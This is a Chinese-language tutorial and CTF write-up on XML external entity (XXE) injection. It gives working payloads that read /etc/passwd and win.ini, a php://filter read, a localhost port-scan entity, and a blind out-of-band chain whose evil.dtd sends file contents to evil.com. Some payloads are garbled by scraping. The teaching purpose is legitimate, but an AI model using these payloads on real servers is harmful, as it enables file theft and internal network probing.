XXE漏洞介紹與運用技巧

twhackteam · 星期五，上午 2:52

0x00前言

早上看到某篇公眾號的文章發了一篇XXE漏洞挖到個星巴克，拿到了一手獎金。決定晚上瞧這洞

XXE又叫XML外部實體注入（XML External Entity Injection）

簡單來說，XXE就是XML外部實體注入。當允許引用外部實體時，透過建構惡意內容，就可能導致任意檔案讀取、系統指令執行、內網連接埠探測、攻擊內網網站等危害。
例如，如果你目前使用的程式為PHP，則可以將libxml_disable_entity_loader設定為TRUE來停用外部實體，從而起到防禦的目的。

XML基礎
在介紹xxe漏洞前，先學習溫顧XML的基礎知識。 XML被設計為傳輸和儲存數據，其焦點是數據的內容，其把數據從HTML分離，是獨立於軟體和硬體的資訊傳輸工具

<!ENTITY 實體名稱"實體的值"> 外部實體: <!ENTITY 實體名稱SYSTEM "URI"> 參數實體： <!ENTITY % 實體名稱"實體的值" > 或 <!ENTITY % 實體名稱SYSTEM "URI"> 實例示範：除參數實體外部實體+內部實體 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE a [ <!ENTITY name "nMask ">]> <foo> <value>&name;</value> < ;/foo> 實例示範：參數實體+外部實體 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE a [ <!ENTITY % name SYSTEM "file:///etc/passwd"> %name; ]> 注意：%name（參數實體）是在DTD中被引用的，而&name（其餘實體）是在xml文件中被引用的。 由於xxe漏洞主要是利用了DTD引用外部實體導致的漏洞，那麼重點看下能引用哪些類型的外部實體。 外部實體 外部實體即在DTD中使用 <!ENTITY 實體名稱SYSTEM "URI"> 語法引用外部的實體，而非內部實體，那麼URL中能寫哪些類型的外部實體呢？ 主要的有file、http、https、ftp等等，當然不同的程式支援的不同： 實例示範： <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE a [ //定義一個外部名稱 < ;!ENTITY content SYSTEM "file:///etc/passwd">]> // SYSTEM "file:///xxxx"用於讀取檔案 <foo> //定義標籤標籤名稱可以隨便輸入，也可以和外名稱對應 <value>&content;</value> </foo> 得帶Content-Type:application/xml頭，如果請求頭類似：Content-Type: application/json，那麼可以改為Content-Type: application/xml試試有沒有xml漏洞 

這裡找來一道CTF的題，BWAPP搭建的XXE好像有問題。和文章用一樣的操作得出來的結果不符合

QCoD1A.png

主題地址：web.jarvisoj.com:9882

QCoWtg.png

抓包一手得到發現是如下請求的

QCooXq.png

將Content-Type改為Content-Type: application/xml,傳送以下內容偵測是否存在XXE

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE sb [ <!ENTITY xxe "XXE Test"> //XXE Test是輸出的內容xxe可以為理解為一個變數 ]> <em> //亂取個名就好 &xxe; //理解為引用變量地址輸出 </em>

讀取文件測試

QC7EZV.png

讀取flag文件

QC72WQ.png

由於這裡是py的環境沒有辦法測試更多

HTTP/1.0 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 44 Server: Werkzeug/0.9.4 Python/2.7.6 Date: Wed, 27 Nov 2019 15:37:08 GMT CTF{XxE_15_n0T_S7range_Enough} 

這裡就直接列出來

ML文檔是用PHP進行解析的，那麼也可以使用php://filter協定來進行讀取。 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE root [ <!ENTITY content SYSTEM "php://filter/resource=c:/windows/win.ini"> ]> <root> <root><foo>&am p;content;</foo></root> 連接埠掃描 載入外部DTD時有兩種載入方式，一種為私有private，第二種為公用public。 私有類型DTD載入： <!ENTITY private_dtd SYSTEM "DTD_location"> 公共型DTD載入： <!ENTITY public_dtd PUBLIC "DTD_name" "DTD_location"> 在公用型別DTD載入的時候，會先使用DTD_name來檢索，如果無法找到，則透過DTD_location來尋找此公用DTD。利用DTD_location，在一定的環境下可以用來做內部網路探測。 <?xml version="1.0" encoding="utf-8"? > <!DOCTYPE root [ <!ENTITY portscan SYSTEM " http://localhost:3389 "> ]> <root><foo> & ;portscan;</foo></root> blind xxe漏洞: 對於傳統的XXE來說，要求攻擊者只有在伺服器有回顯或報錯的基礎上才能使用XXE漏洞來讀取伺服器端文件，如果沒有回顯則可以使用Blind XXE漏洞來建立一條帶外頻道提取資料。 利用DTD進行資料回顯 有時讀取檔案時沒有回顯，這時可以利用DTD參數實體的特性將檔案內容拼接到url中，達到讀取檔案的效果。 <?xml version="1.0" encoding="utf-8"? > <!DOCTYPE root[ <!ENTITY % file SYSTEM "php://fileter/convert.base64-encode/resource=c:/windows/win.ini"> <!ENTITY % dtd SYSTEM " http://192.168.1.100:8000/evil.dtd "> %dtd; %send;]> <root></root> evil.dtd <!ENTITY % payload "<!ENTITY &#x25; send SYSTEM 'http://evil.com /?content=%file;'>"> %payload; 在evil.dtd中將%file實體的內容拼接到url後，然後利用burp等工具，查看url請求就能獲得我們需要的內容

XXE漏洞介紹與運用技巧

twhackteam

Administrator

0x00前言​

0x00前言